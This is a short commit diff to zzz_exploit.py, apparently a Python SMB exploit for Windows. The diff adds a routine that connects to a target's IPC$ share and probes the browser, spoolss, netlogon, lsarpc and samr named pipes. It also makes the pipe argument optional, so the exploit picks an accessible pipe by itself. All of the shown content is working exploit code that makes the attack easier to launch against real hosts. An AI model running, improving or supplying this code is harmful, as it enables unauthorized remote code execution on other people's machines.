find named pipe if it is omitted

zzz_exploit.py

@@ -269,6 +269,22 @@ def wait_for_request_processed(conn):
 	# send echo is faster than sleep(0.05) when connection is very good
 	conn.send_echo('a')
 
+def find_named_pipe(conn):
+	pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
+	
+	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
+	found_pipe = None
+	for pipe in pipes:
+		try:
+			fid = conn.nt_create_andx(tid, pipe)
+			conn.close(tid, fid)
+			found_pipe = pipe
+		except smb.SessionError, e:
+			pass
+	
+	conn.disconnect_tree(tid)
+	return found_pipe
+
 
 special_mid = 0
 extra_last_mid = 0
@@ -768,6 +784,13 @@ def exploit(target, pipe_name):
 	else:
 		print('This exploit does not support this target')
 		sys.exit()
+	
+	if pipe_name is None:
+		pipe_name = find_named_pipe(conn)
+		if pipe_name is None:
+			print('Not found accessible named pipe')
+			return False
+		print('Using named pipe: '+pipe_name)
 
 	if not info['method'](conn, pipe_name, info):
 		return False
@@ -921,12 +944,12 @@ def service_exec(conn, cmd):
 	rpcsvc.disconnect()
 
 
-if len(sys.argv) != 3:
-	print("{} <ip> <pipe_name>".format(sys.argv[0]))
+if len(sys.argv) < 2:
+	print("{} <ip> [pipe_name]".format(sys.argv[0]))
 	sys.exit(1)
 
 target = sys.argv[1]
-pipe_name = sys.argv[2]
+pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
 
 exploit(target, pipe_name)
 print('Done')